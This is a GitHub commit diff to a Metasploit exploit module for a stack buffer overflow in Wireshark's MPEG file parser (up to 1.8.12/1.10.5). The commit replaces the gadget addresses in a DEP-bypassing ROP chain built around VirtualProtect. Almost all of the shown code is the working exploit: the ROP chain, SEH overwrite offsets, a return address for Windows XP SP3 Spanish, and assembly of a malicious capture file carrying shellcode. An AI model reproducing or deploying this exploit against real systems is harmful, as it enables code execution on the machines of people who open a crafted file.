Skip to content

Commit feea4c1

Browse files
committed
ROP chain changed
1 parent e811e16 commit feea4c1

File tree

1 file changed

+17
-16
lines changed

1 file changed

+17
-16
lines changed

modules/exploits/windows/misc/wireshark_mpeg_overflow.rb

Lines changed: 17 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
1313

1414
def initialize(info = {})
1515
super(update_info(info,
16-
'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC',
16+
'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
1717
'Description' => %q{
1818
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
1919
by generating an malicious file.)
@@ -48,7 +48,7 @@ def initialize(info = {})
4848
[ 'WinXP SP3 Spanish (bypass DEP)',
4949
{
5050
'OffSet' => 70692,
51-
'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
51+
'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
5252
'jmpesp' => 0x68e2bfb9,
5353
}
5454
],
@@ -66,28 +66,29 @@ def initialize(info = {})
6666
def junk
6767
return rand_text(4).unpack("L")[0].to_i
6868
end
69+
6970
def create_rop_chain()
7071

7172
# rop chain generated with mona.py - www.corelan.be
7273
rop_gadgets =
7374
[
74-
0x78b41ccb, # POP EAX # RETN [MSVCR100.dll]
75+
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
7576
0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]
76-
0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll]
77-
0x68605980, # XCHG EAX,ESI # RETN [libglib-2.0-0.dll]
78-
0x64f94ba1, # POP EBP # RETN [libfontconfig-1.dll]
79-
0x63cd04f1, # & push esp # ret [liblzma-5.dll]
80-
0x6d4c331b, # POP EBX # RETN [libpangocairo-1.0-0.dll]
77+
0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
78+
0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
79+
0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
80+
0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
81+
0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
8182
0x00000201, # 0x00000201-> ebx
82-
0x78aa3bfb, # POP EDX # RETN [MSVCR100.dll]
83+
0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
8384
0x00000040, # 0x00000040-> edx
84-
0x78b29eda, # POP ECX # RETN [MSVCR100.dll]
85+
0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
8586
0x668242b9, # &Writable location [libgnutls-26.dll]
86-
0x70f67579, # POP EDI # RETN [libxml2-2.dll]
87+
0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
8788
0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]
88-
0x6d5f8297, # POP EAX # RETN [libgio-2.0-0.dll]
89+
0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
8990
0x90909090, # nop
90-
0x6536979d, # PUSHAD # RETN [libpixman-1-0.dll]
91+
0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
9192
].flatten.pack("V*")
9293

9394
return rop_gadgets
@@ -98,14 +99,14 @@ def exploit
9899

99100
print_status("Creating '#{datastore['FILENAME']}' file ...")
100101
magic_header = "\xff\xfb" # mpeg magic_number
101-
packet = pattern_create(892)
102+
packet = pattern_create(892)
102103
ropchain = create_rop_chain
103104
packet << ropchain
104105
packet << payload.encoded # Shellcode
105106
packet << pattern_create(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
106107
# SEH pointers overwrite (nseh & seh)
107-
packet << "\x90\x90\x90\x90" # nseh
108-
# 0xff is badchar then we can't make a jump back with jmp $-2000
108+
packet << make_nops(4) # nseh
109+
# \0xff is a badchar then we can't make a jump back with jmp $-2000
109110
# After nseh and seh we haven't space, then we have to jump to another location.
110111
# 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA
111112
packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN

0 commit comments

Comments
 (0)